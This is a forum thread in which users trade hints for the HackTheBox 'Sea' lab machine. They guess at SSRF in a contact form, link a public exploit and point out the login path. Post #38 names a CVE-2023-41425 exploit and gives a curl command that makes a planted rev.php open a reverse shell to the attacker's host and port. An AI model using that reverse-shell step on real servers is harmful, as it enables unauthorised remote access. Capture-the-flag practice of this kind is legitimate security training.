[HTB] Sea - Machine
by RedTeamer - Friday August 9, 2024 at 08:04 PM
#31
Right now im kind of thinking some kind of SSRF (server side request forgery vulerability on that contact.php form. ) Since it seems to be reaching out to what ever website we put in the form

might be possible to have it reach out to the box its self making request to access resources on the box from its self thus bypassing normal security policies cause the box trust its self.

This forum account is currently banned. Ban Length: Permanent (N/A Remaining)
Ban Reason: Asking for reputation
Reply
#32
https://packetstormsecurity.com/files/17...ution.html

try this
Reply
#33
(Aug 10, 2024, 09:17 PM)abhiramhtb Wrote: https://packetstormsecurity.com/files/17...ution.html

try this

bro where is the login path

This forum account is currently banned. Ban Length: Permanent (N/A Remaining)
Ban Reason: Asking for rep is not allowed
Reply
#34
(Aug 10, 2024, 09:17 PM)abhiramhtb Wrote: https://packetstormsecurity.com/files/17...ution.html

try this

did you find the login page?
Reply
#35
(Aug 10, 2024, 09:21 PM)osamy7593 Wrote:
(Aug 10, 2024, 09:17 PM)abhiramhtb Wrote: https://packetstormsecurity.com/files/17...ution.html

try this

bro where is the login path

there is no login page, that CVE is not applicable. The way forward is exploiting SSRF on the website I believe, there is nothing else
Reply
#36
(Aug 10, 2024, 09:23 PM)kewlcat002 Wrote:
(Aug 10, 2024, 09:21 PM)osamy7593 Wrote:
(Aug 10, 2024, 09:17 PM)abhiramhtb Wrote: https://packetstormsecurity.com/files/17...ution.html

try this

bro where is the login path

there is no login page, that CVE is not applicable. The way forward is exploiting SSRF on the website I believe, there is nothing else

yes there is, check /loginURL
Reply
#37
login page
http://sea.htb/index.php?page=loginURL
Reply
#38
USER FLAG
https://github.com/prodigiousMind/CVE-2023-41425    Use this exploit for revshell and listen in an port then run the command curl 'http://sea.htb/themes/revshell-main/rev.php?lhost=10.10.x.x&lport=9001'

This forum account is currently banned. Ban Length: Permanent (N/A Remaining)
Ban Reason: Selling in HTB | Trying to sell information posted for free
Reply
#39
(Aug 10, 2024, 09:23 PM)kewlcat002 Wrote:
(Aug 10, 2024, 09:21 PM)osamy7593 Wrote:
(Aug 10, 2024, 09:17 PM)abhiramhtb Wrote: https://packetstormsecurity.com/files/17...ution.html

try this

bro where is the login path

there is no login page, that CVE is not applicable. The way forward is exploiting SSRF on the website I believe, there is nothing else

yes please check man
Reply
#40
I think SSRF is the way to exploit the server. Found that the server hitting back to the attack machine. It need to bypass something I think.
Reply


Possibly Related Threads…
Thread Author Replies Views Last Post
  [FREE] CPTS 12 FLAGS pulsebreaker 68 1,871 1 hour ago
Last Post: VictorPipeau
  [FREE] HackTheBox Dante - complete writeup written by Tamarisk Tamarisk 601 91,444 1 hour ago
Last Post: VictorPipeau
  [FREE] 300+ Writeups PDF HackTheBox/HTB premium retired Tamarisk 371 92,745 2 hours ago
Last Post: phannguyenbaouy1
  [FREE] HackTheBox Academy - CBBH CDSA CPTS All Modules Flags Techtom 21 2,595 6 hours ago
Last Post: popoler
  Hack the box Pro Labs, VIP, VIP+ 1 month free Method RedBlock 23 2,240 Yesterday, 02:10 PM
Last Post: kkkato

Forum Jump:


 Users browsing this forum: 1 Guest(s)